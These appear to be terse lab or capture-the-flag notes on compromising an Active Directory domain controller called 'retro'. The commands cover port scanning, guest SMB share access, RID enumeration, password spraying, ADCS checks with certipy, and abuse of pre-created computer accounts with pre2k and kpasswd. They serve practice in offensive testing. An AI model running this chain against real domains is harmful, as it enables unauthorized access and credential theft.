10.10.122.154
rustscan -a ips.txt --ulimit 5000 -- -Pn -sC -sV -oA retro
Open 10.10.122.154:53
Open 10.10.122.154:88
Open 10.10.122.154:135
Open 10.10.122.154:139
Open 10.10.122.154:389
Open 10.10.122.154:445
Open 10.10.122.154:593
Open 10.10.122.154:636
Open 10.10.122.154:3389
Open 10.10.122.154:464
Open 10.10.122.154:9389
commonName=DC.retro.vl
commonName=retro-DC-CA/domainComponent=retro
cme smb ips.txt -u 'a' -p ''
smbclient.py 'guest:@10.10.122.154'
use Trainees
mget *
exit
lookupsid.py guest@10.10.122.154
cme smb ips.txt -u users.txt -p users.txt --no-bruteforce
cme ldap ips.txt -u 'trainee' -p 'trainee' -M adcs
certipy find -vulnerable -username 'trainee' -p 'trainee' -dc-ip 10.10.122.154
smbclient.py 'trainee:trainee@10.10.122.154'
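Finding pre-created computer accounts (computer objects staged in AD before the host is joined; if never used, they can still carry the default password derived from the account name, so unused ones should be reset or removed)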
pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl
cme smb ips.txt -u 'Banking' -p '/usr/share/wordlists/seclists/Passwords/Common-Credentials/common-passwords-win.txt'
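Old machine account (banking$): the pre-created default password is still set, so it is changed with kpasswd before the account is used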
pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl
kpasswd banking$
banking
certipy find -vulnerable -u 'trainee'@retro.vl -p trainee -dc-ip 10.10.82.138